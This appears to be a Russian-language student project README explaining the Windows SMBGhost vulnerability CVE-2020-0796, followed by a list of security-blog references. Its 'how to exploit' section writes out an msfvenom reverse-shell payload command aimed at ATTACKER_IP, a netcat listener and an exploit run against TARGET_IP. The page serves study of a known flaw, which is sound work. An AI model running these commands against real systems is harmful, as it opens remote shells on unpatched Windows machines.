CVE-2020-0796
Объяснение и исследование уязвимости CVE-2020-0796 для семестрового проекта CENG325 для начинающих
Как эксплуатировать?
Генерация полезной нагрузки для обратной оболочки:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
Порт прослушивания:
nc -lvnp 5555
Запуск эксплойта:
python3 exploit.py -ip TARGET_IP
PoC Репозитории
Ссылки
- CVE-2020-0796: «Червеобразная» уязвимость удаленного выполнения кода в… (2020, 13 марта). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- «I’ll ask your body»: SMBGhost pre-auth RCE с использованием структур Direct Memory Access. (2020, 20 апреля). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- CVE-2020-0796 Уязвимость повреждения памяти в SMB-сервере Windows 10 | FortiGuard Labs. (2020, 12 марта). Fortinet Blog.
https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Команда K. (2020, 2 апреля). Анализ POC эксплойта LPE CVE-2020-0796 Windows SMBv3. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –. (2020). Блог Cyber Threat Insider.https://blog.sensecy.com/tag/cve-2020-0796/
Участники проекта